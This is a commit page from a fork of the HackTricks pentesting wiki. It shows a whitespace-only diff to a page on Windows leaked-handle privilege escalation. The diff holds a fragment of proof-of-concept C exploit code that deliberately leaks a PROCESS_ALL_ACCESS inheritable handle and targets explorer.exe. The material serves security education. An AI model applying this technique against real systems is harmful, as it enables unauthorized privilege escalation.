coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [#3053] No subject

Browse Source
This commit is contained in:
CPol 2022-03-13 15:41:22 +00:00 committed by gitbook-bot
parent 9027707da9
commit 3a14232f69
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
windows/windows-local-privilege-escalation/leaked-handle-exploitation.md
View File

@ -55,15 +55,15 @@ int FindTarget(const char *procname) {
int Exploit(void) {
STARTUPINFOA si;
PROCESS_INFORMATION pi;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
int pid = 0;
HANDLE hUserToken;
HANDLE hUserToken;
HANDLE hUserProc;
HANDLE hProc;
HANDLE hProc;
// open a handle to itself (privileged process) - this gets leaked!
hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
// get PID of user low privileged process
if ( pid = FindTarget("explorer.exe") )